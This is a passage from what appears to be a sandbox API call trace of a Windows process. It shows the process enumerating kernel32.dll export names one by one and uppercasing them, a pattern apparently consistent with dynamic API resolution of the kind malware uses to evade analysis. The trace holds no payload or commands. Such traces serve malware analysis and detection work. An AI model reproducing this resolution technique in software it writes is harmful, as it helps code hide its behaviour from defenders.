(lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.195] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.196] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.196] lstrlenA (lpString="kernel32.dll") returned 12 [0086.196] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.196] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.196] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.196] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.196] lstrlenA (lpString="ADDATOMA") returned 8 [0086.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.196] lstrlenA (lpString="ADDATOMW") returned 8 [0086.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.196] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.196] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.197] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.197] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.197] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.197] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.197] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.197] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.197] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.197] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.197] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.197] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.197] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.197] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.197] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.197] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.197] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.197] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.197] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.197] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.197] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.197] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.198] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.198] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.198] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.198] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.198] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.198] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.198] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.198] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.198] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.198] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.198] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.198] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.198] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.198] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.198] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.198] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.198] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.198] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.198] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.199] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.199] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.199] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.199] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.199] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.199] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.199] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.199] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.199] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.199] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.199] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.199] lstrlenA (lpString="BEEP") returned 4 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.199] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.199] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.199] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.199] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.199] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.199] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.199] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.200] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.200] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.200] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.200] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.200] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.200] lstrlenA (lpString="CANCELIO") returned 8 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.200] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.200] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.200] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.200] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.200] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.200] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.200] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.200] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.200] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.200] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.200] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.200] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.200] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.200] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.201] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.201] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.201] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.201] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.201] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.201] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.201] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.201] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.201] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.201] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.201] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.201] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.201] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.201] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.201] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.201] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.201] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.201] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.202] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.202] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.202] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.202] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.202] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.202] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.202] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.202] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.202] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.202] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.202] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.202] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.202] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.203] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.203] lstrlenA (lpString="COPYFILEA") returned 9 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.203] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.203] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.203] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.203] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.203] lstrlenA (lpString="COPYFILEW") returned 9 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.203] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.203] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") 